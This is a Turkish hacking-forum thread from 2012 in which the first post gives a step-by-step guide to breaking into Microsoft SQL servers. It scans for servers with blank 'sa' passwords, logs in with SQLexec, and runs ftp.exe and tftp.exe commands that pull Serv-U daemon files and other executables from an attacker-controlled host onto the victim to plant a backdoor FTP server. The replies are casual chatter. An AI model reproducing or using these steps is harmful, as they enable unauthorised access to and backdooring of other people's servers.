İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

SQL (Server) Hacking

06-07-2012 18:44
#1
Hacker Yilmaz - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
07/2012
Nereden:
Bruksel
Mesajlar:
1.039
Teşekkür (Etti):
6
Teşekkür (Aldı):
70
Konular:
229
Ticaret:
(0) %
S.A. Arkadaslar...

Ilk Önce Cay Demlemek Üzere Ocaga Su Koyuyoruz Ve Tekrar PC\'mizin Basina Geciyoruz ))) (Ilerleyen Bölümlerde Isimize Yarayacak)
Gerekli Materyaller:
SQL Scanner
SERV-U
SQLexec
TFTP
Eveet Bu Yukarda Yazdiklarim Nedir Ne Ise Yarar Birazdan Görecegiz.
a) Ilk Önce Serv-u Yu Ayarlayip Portunu 4 Rakamli Konuma Getirecegiz. Örnek: 3275
b) SQL Scan Result Örnegin Su Sekilde Görünür: 127.0.0.1 Found MsSQL account: sa/[Null]
Burdaki Gördügümüz "sa" Username "[Null]" ise Password\'dur. "[Null]" Bu Password Belirtilmemis Demektir.
c) SQLexec\'i Aynen Bu Sekilde Ayarliyoruz. Username: sa Password: [Null]
d) Serv-u Icin Bir Path Yani Dizin Buluyoruz.
e) TFTP\'yi Kendi Bilgisayarimizda Calistiriyoruz.
f) SQL\'de Normal DOS Komutlari Gecerlidir. Dolayisiyla DOS Komutlariyla Calisacagiz.
g) c:winntsystem32 ftp.exe -i 172.185.14.77 get serv-u.ini c:Buraya Path serv-u.ini << Yazacagiz. Yani Serv-u.ini nin Yolunu Yazacagiz. Bu Komutla Serv-u.ini\'yi Aliyoruz.
h) c:winntsystem32 ftp.exe -i 172.185.14.77 get serv-u.exe c:Buraya Path serv-u.exe << Yazacagiz. Yani Serv-u.exe nin Yolunu Yazacagiz.
i) Sonra DirServ-u.exe Yaziyoruz. Bu Komutla Serv-u.exe\'mizi Calistiririz.
1) Scan Ve RecHecken:
Ilk Önce SQL Server Bulabilmemiz Icin SQL Server Scanner Bulmamiz Gerek. Bunu "Sfind.exe" Adli Programla Yapabiliriz. SQL Server\'lerin Port\'u 1433\'dür. Bununla Beraber Scan Yapiyoruz.
Scan Olayi Bittikten Sonra Scanner\'imiz Bize Bir Yigin IP Adresi Verecektir. Sifre Bulabilmemiz Icin Bu IP Adreslerini RecHecken Yapmamiz Lazim. Su Sekilde:
"SQLLHF.exe" Adli Dosyayi HDD\'mizin C Sürücüsüne Kopyeliyoruz. Sonra "Check_1.bat" Isimli Dosyayi HDD\'mizin C Sürücüsüne Kopyeliyoruz. Ayni Sekilde "Sfind.exe" Adli Scanner\'imize Ait Olan "Sfind.txt" Dosyasida C Sürücüsünde Olmalidir.
Sonra DOS\'u Aciyoruz Ve "Check_1.bat Dosyasini Calistiriyoruz. O Otomatik Olarak Sfind.txt\'deki IP\'lere Ping Atacak. Bu Islem Yaklasik 5 Dakika Sürecektir.
Bu Arada Biz, Koydugumuz Cay Suyuna Bakiyoruz Ve Cayimizi Demliyoruz. Cayimizi Yudumlayarak Islemlerimize Devam Ediyoruz )))
PING Olayi Bitti. Simdi Sonuclara Bakiyoruz. Örnegin: "Checking 127.xxx.xx.xx ::: Password not guessed" Su Sekilde Bir Yazi Varsa Bu Serveri Hackleyemeyiz. Ama Su Sekilde Olursa: "Checking 127.xxx.xx.xx ::: Password is blank!! <---- WARNING!" Iste O Zaman Hackleyebiliriz Demektir
2) Connecting Yani Hacking
"SQLexec.exe" Adli Tool\'umuzu Calistiriyoruz. Buldugumuz IP Adresini Giriyoruz. Username\'yi Her Halukarda sa Olarak Ve Password\'u Blank Olarak Giriyoruz.
Simdi Asagiya "dir c:" Komutunu Veriyoruz. Veeee SQL Server\'in C Sürücüsüne Girmis Oluyoruz ))
Serv-u Dosyalarini TFTP\'ye Yüklemek Icin Su Komutlari Verebiliriz (IP Adresini Örnek Olarak Veriyorum):
tftp.exe -i 127.0.0.1 GET Servudaemon.exe c:server.exe
tftp.exe -i 127.0.0.1 GET TzoLibr.dll c: TzoLibr.dll
tftp.exe -i 127.0.0.1 GET winmgnt.exe c:winmgnt.exe
tftp.exe -i 127.0.0.1 GET httpodbc.dll c:httpodbc.dll
tftp.exe -i 127.0.0.1 GET ServUDaemon.ini c:ServUDaemon.ini
tftp.exe -i 127.0.0.1 GET speed.exe c:windowssystem32speed.exe ? ?
tftp.exe -i 127.0.0.1 GET 1.txt c:windowssystem321.txt )____ ????
tftp.exe -i 127.0.0.1 GET 2.txt c:windowssystem322.txt )
Yukarda Belirtmis Oldugum Tool Ve Programlari Google\'den Bulmaniz Gerekecek. Aradim Aradim Arsivlerimde Bulamadim. Eee 100 GB\'den Fazla Arsiv Bulundurursan Aradiklarini Kolay Kolay Bulamazsin )
Kolay Gelsin...

06-07-2012 19:01
#2
Üyelik tarihi:
07/2012
Nereden:
Manisa
Mesajlar:
176
Teşekkür (Etti):
10
Teşekkür (Aldı):
13
Konular:
5
Ticaret:
(0) %
bilader çay molası verdirmedin
06-07-2012 19:55
#3
Hacker Yilmaz - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
07/2012
Nereden:
Bruksel
Mesajlar:
1.039
Teşekkür (Etti):
6
Teşekkür (Aldı):
70
Konular:
229
Ticaret:
(0) %
idare ediceksin

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı